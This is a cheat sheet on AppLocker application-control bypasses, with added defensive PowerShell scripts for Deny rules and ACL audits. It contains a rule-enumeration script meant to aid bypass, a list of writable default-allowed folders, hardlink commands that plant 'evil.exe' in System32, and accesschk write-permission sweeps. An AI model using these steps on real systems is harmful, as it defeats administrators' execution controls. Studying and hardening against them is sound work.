Applocker

AppLocker advances the app control features and functionality of Software Restriction Policies. AppLocker contains new capabilities and extensions that allow you to create rules to allow or deny apps from running based on unique identities of files and to specify which users or groups can run those apps.

An AppLocker block message looks like this:

Program 'a.exe' failed to run: This program is blocked by group policy. For more information, contact your system administrator At line:1 char:1

View AppLocker policy

Check whether the user has a folder that is exempt from the AppLocker policy:

(Get-AppLockerPolicy -Local).RuleCollections
or
Get-ChildItem -Path HKLM:\Software\Policies\Microsoft\Windows\SrpV2 -Recurse
or
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\560d03c2-b277-4331-8c59-bc7d4eb08359

Example for AppLocker

PowerShell

There is a PowerShell module named AppLocker that can query the AppLocker rules enforced on the current system. Below is a simple PowerShell script that prints the rules in a readable format so you can use this information to bypass them.

Import-Module AppLocker
[xml]$data = Get-AppLockerPolicy -Effective -Xml

# Walk every rule collection that is actually enforced and print its rules.
Write-Output "[+] Printing AppLocker Rules [+]`n"
$data.AppLockerPolicy.RuleCollection | Where-Object { $_.EnforcementMode -match "Enabled" } | ForEach-Object {
    # Path rules (the built-in "(Default Rule)" entries are skipped)
    $_.FilePathRule | Where-Object { $_.Name -NotLike "(Default Rule)*" } | ForEach-Object {
        Write-Output "=== File Path Rule ===`n`n Rule Name : $($_.Name) `n Condition : $($_.Conditions.FilePathCondition.Path)`n Description: $($_.Description) `n Group/SID : $($_.UserOrGroupSid)`n`n"
    }
    # Hash rules
    $_.FileHashRule | ForEach-Object {
        Write-Output "=== File Hash Rule ===`n`n Rule Name : $($_.Name) `n File Name :  $($_.Conditions.FileHashCondition.FileHash.SourceFileName) `n Hash type : $($_.Conditions.FileHashCondition.FileHash.Type) `n Hash :  $($_.Conditions.FileHashCondition.FileHash.Data) `n Description: $($_.Description) `n Group/SID : $($_.UserOrGroupSid)`n`n"
    }
    # Publisher (signature) rules, again without the default entries
    $_.FilePublisherRule | Where-Object { $_.Name -NotLike "(Default Rule)*" } | ForEach-Object {
        Write-Output "=== File Publisher Rule ===`n`n Rule Name : $($_.Name) `n PublisherName : $($_.Conditions.FilePublisherCondition.PublisherName) `n ProductName : $($_.Conditions.FilePublisherCondition.ProductName) `n BinaryName : $($_.Conditions.FilePublisherCondition.BinaryName) `n BinaryVersion Min. : $($_.Conditions.FilePublisherCondition.BinaryVersionRange.LowSection) `n BinaryVersion Max. : $($_.Conditions.FilePublisherCondition.BinaryVersionRange.HighSection) `n Description: $($_.Description) `n Group/SID : $($_.UserOrGroupSid)`n`n"
    }
}

Bypass

The default rules allow execution of anything in:

%WINDIR%\*

%PROGRAMFILES%\*

Folders under the allowed paths that standard users can write to (and that are therefore effectively whitelisted):

C:\Windows\Tasks
C:\Windows\Temp
C:\windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System
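From the defender's side, the fix for this list is explicit Deny path rules: AppLocker evaluates Deny rules before Allow rules, so a Deny on each writable subfolder overrides the default "%WINDIR%\*" Allow rule. The following PowerShell script is an added example, not code from the original page; the function names New-DenyPathRuleXml and New-DenyPolicyXml and the output file name under %TEMP% are my own choices. It emits an AppLocker policy XML fragment for the folders above and merges it into the local policy with Set-AppLockerPolicy -Merge (which needs an elevated shell).

```powershell
# Added example (not from the original page): turn the list of user-writable
# folders under %WINDIR% into explicit AppLocker Deny path rules for Everyone
# (SID S-1-1-0). Deny rules take precedence over the default "%WINDIR%\*" Allow.
$WritableFolders = @(
    'Tasks', 'Temp', 'tracing', 'Registration\CRMLog',
    'System32\FxsTmp', 'System32\com\dmp',
    'System32\Microsoft\Crypto\RSA\MachineKeys',
    'System32\spool\PRINTERS', 'System32\spool\SERVERS', 'System32\spool\drivers\color',
    'System32\Tasks\Microsoft\Windows\SyncCenter',
    'SysWOW64\FxsTmp', 'SysWOW64\com\dmp',
    'SysWOW64\Tasks\Microsoft\Windows\SyncCenter',
    'SysWOW64\Tasks\Microsoft\Windows\PLA\System'
)

function New-DenyPathRuleXml {
    # Hypothetical helper: one <FilePathRule> element per folder, using the
    # AppLocker %WINDIR% path variable so the rule is not tied to drive C:.
    param([string]$Collection, [string]$RelativePath)
    $id   = [guid]::NewGuid().ToString()
    $path = [System.Security.SecurityElement]::Escape("%WINDIR%\$RelativePath\*")
    $name = [System.Security.SecurityElement]::Escape("Deny $Collection in $RelativePath")
@"
    <FilePathRule Id="$id" Name="$name" Description="User-writable folder under WINDIR" UserOrGroupSid="S-1-1-0" Action="Deny">
      <Conditions>
        <FilePathCondition Path="$path" />
      </Conditions>
    </FilePathRule>
"@
}

function New-DenyPolicyXml {
    # Hypothetical helper: wrap the rules in one RuleCollection per file type.
    # EnforcementMode="NotConfigured" leaves the collection's current mode untouched,
    # so merging this fragment never switches a collection from audit to enforce.
    param([string[]]$Folders, [string[]]$Collections = @('Exe', 'Script'))
    $collections = foreach ($c in $Collections) {
        $rules = ($Folders | ForEach-Object { New-DenyPathRuleXml -Collection $c -RelativePath $_ }) -join "`n"
        "  <RuleCollection Type=`"$c`" EnforcementMode=`"NotConfigured`">`n$rules`n  </RuleCollection>"
    }
    "<AppLockerPolicy Version=`"1`">`n$($collections -join "`n")`n</AppLockerPolicy>"
}

# Constructed output location; review the XML before merging it.
$xmlPath = Join-Path $env:TEMP 'applocker-deny-writable-folders.xml'
New-DenyPolicyXml -Folders $WritableFolders | Set-Content -LiteralPath $xmlPath -Encoding UTF8
Get-Content -LiteralPath $xmlPath

# Merge with the existing local policy (requires an elevated PowerShell).
Set-AppLockerPolicy -XmlPolicy $xmlPath -Merge
```

Roll the merged policy out with the affected collections in AuditOnly first and check the AppLocker event log for unexpected blocks before switching to Enabled; add 'Dll' and 'Msi' to the Collections parameter only if those collections are in use, since the rules have no effect in a collection that is not configured.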

If you can place a file or folder into one of these paths, you become the owner of that object and can change its ACL, either in the GUI or with icacls. That includes adding Execute rights and more. If a deny-execute ACE is inherited, you can either disable inheritance or create a hard link to a binary in another folder using one of these commands:

fsutil hardlink create c:\windows\system32\fxstmp\evil.exe c:\myfolder\plantedfile.exe

mklink /h c:\windows\system32\fxstmp\evil.exe c:\myfolder\plantedfile.exe

You can check for additional writable paths by running accesschk from Sysinternals with these commands:

accesschk -w -s -q -u Users "C:\Program Files" >> programfiles.txt
accesschk -w -s -q -u Everyone "C:\Program Files" >> programfiles.txt
accesschk -w -s -q -u "Authenticated Users" "C:\Program Files" >> programfiles.txt
accesschk -w -s -q -u Interactive "C:\Program Files" >> programfiles.txt

accesschk -w -s -q -u Users "C:\Program Files (x86)" >> programfilesx86.txt
accesschk -w -s -q -u Everyone "C:\Program Files (x86)" >> programfilesx86.txt
accesschk -w -s -q -u "Authenticated Users" "C:\Program Files (x86)" >> programfilesx86.txt
accesschk -w -s -q -u Interactive "C:\Program Files (x86)" >> programfilesx86.txt

accesschk -w -s -q -u Users "C:\Windows" >> windows.txt
accesschk -w -s -q -u Everyone "C:\Windows" >> windows.txt
accesschk -w -s -q -u "Authenticated Users" "C:\Windows" >> windows.txt
accesschk -w -s -q -u Interactive "C:\Windows" >> windows.txt
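The same audit can be done without Sysinternals so it fits into a scheduled hardening check. The script below is an added example (not from the original page and not an accesschk feature): it walks the AppLocker default-allowed roots (%WINDIR%, %PROGRAMFILES% and %PROGRAMFILES(X86)%) and reports every folder whose ACL grants a broad principal (Everyone, BUILTIN\Users, Authenticated Users, INTERACTIVE) the right to create files or subfolders. Those folders are the ones that need an explicit Deny rule or an ACL fix. The function name Get-BroadlyWritableFolders is my own.

```powershell
# Added example (not from the original page): find folders under the AppLocker
# default-allowed roots that any standard user can write to. Run it as the
# account you want to audit, or as admin to see the full tree.
$Roots = @($env:WINDIR, $env:ProgramFiles, ${env:ProgramFiles(x86)}) | Where-Object { $_ }

# Principals that effectively mean "every user on this machine".
$BroadPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Any of these rights lets the principal place a new file in the directory.
# Generic access masks (GENERIC_WRITE etc.) are not expanded here; accesschk
# resolves those, so keep it as a second opinion.
$WriteMask = [int][System.Security.AccessControl.FileSystemRights]'CreateFiles, CreateDirectories, Write, Modify, FullControl'

function Get-BroadlyWritableFolders {
    param([string[]]$Paths)
    foreach ($root in $Paths) {
        # Include the root itself plus every subdirectory we are allowed to list.
        $dirs = @(Get-Item -LiteralPath $root -ErrorAction SilentlyContinue) +
                @(Get-ChildItem -LiteralPath $root -Directory -Recurse -Force -ErrorAction SilentlyContinue)
        foreach ($dir in $dirs) {
            try { $acl = Get-Acl -LiteralPath $dir.FullName -ErrorAction Stop } catch { continue }
            $hits = @($acl.Access | Where-Object {
                $_.AccessControlType -eq 'Allow' -and
                $BroadPrincipals -contains $_.IdentityReference.Value -and
                (([int]$_.FileSystemRights) -band $WriteMask) -ne 0
            })
            if ($hits.Count -gt 0) {
                [pscustomobject]@{
                    Path       = $dir.FullName
                    Principals = (@($hits | ForEach-Object { $_.IdentityReference.Value }) | Sort-Object -Unique) -join ', '
                    Rights     = (@($hits | ForEach-Object { $_.FileSystemRights.ToString() }) | Sort-Object -Unique) -join ' | '
                }
            }
        }
    }
}

Get-BroadlyWritableFolders -Paths $Roots | Format-Table -AutoSize
```

On a stock install the output should contain the folders listed above and little else; anything additional (typically third-party software under Program Files with a permissive installer ACL) is a candidate for an explicit Deny rule or for tightening the ACL with icacls.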

Tools

  • unlock - Microsoft Applocker evasion tool

  • LOLBas - Living Off The Land Binaries And Scripts

Resources

https://blog.pwn.al/security/applocker/bypass/custom/rules/windows/2018/09/13/applocker-custom-rules-bypass.html
